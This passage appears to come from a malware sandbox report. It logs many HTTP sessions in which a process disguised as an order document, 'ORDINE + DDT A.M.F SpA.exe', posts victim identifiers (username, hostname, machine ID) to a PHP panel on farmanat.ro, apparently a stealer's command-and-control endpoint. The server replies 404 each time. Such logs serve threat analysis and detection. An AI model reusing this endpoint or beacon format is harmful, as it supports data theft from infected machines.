                                              Date: Thu, 25 Nov 2021 09:55:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              852192.168.11.2050700176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:19.101720095 CET7487OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:19.135749102 CET7487OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:19.201625109 CET7488INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              853192.168.11.2050701176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:19.627458096 CET7489OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:19.661326885 CET7489OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:19.716433048 CET7489INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              854192.168.11.2050702176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:20.138106108 CET7490OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:20.172432899 CET7490OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:20.223124027 CET7490INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              855192.168.11.2050703176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:20.632791042 CET7491OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:20.667056084 CET7491OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:20.720868111 CET7492INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              856192.168.11.2050704176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:21.146266937 CET7492OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:21.179838896 CET7493OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:21.229245901 CET7493INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              857192.168.11.2050705176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:21.663105965 CET7494OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:21.697355986 CET7494OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:21.747150898 CET7494INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              858192.168.11.2050706176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:22.180632114 CET7495OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:22.215109110 CET7495OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:22.267002106 CET7496INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              859192.168.11.2050707176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:22.690104961 CET7496OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:22.723547935 CET7497OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:22.777199030 CET7497INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              86192.168.11.2049923176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:54.400388002 CET6434OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:54.433872938 CET6434OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:54.490242004 CET6434INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              860192.168.11.2050708176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:23.208795071 CET7498OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:23.242975950 CET7498OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:23.298696995 CET7498INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              861192.168.11.2050709176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:23.713367939 CET7499OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:23.746927977 CET7499OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:23.799150944 CET7500INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              862192.168.11.2050710176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:24.216252089 CET7500OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:24.249738932 CET7501OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:24.304250956 CET7501INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              863192.168.11.2050711176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:24.719605923 CET7502OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:24.753768921 CET7502OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:24.807768106 CET7502INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              864192.168.11.2050712176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:25.235141039 CET7503OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:25.269308090 CET7503OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:25.319226980 CET7504INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              865192.168.11.2050713176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:25.759053946 CET7504OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:25.792563915 CET7505OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:25.841828108 CET7505INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              866192.168.11.2050714176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:26.277776003 CET7506OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:26.312141895 CET7506OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:26.363966942 CET7506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              867192.168.11.2050715176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:26.773686886 CET7507OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:26.807885885 CET7507OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:26.857871056 CET7508INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              868192.168.11.2050716176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:27.262392044 CET7508OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:27.295998096 CET7509OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:27.345201969 CET7509INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              869192.168.11.2050717176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:27.777040958 CET7510OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
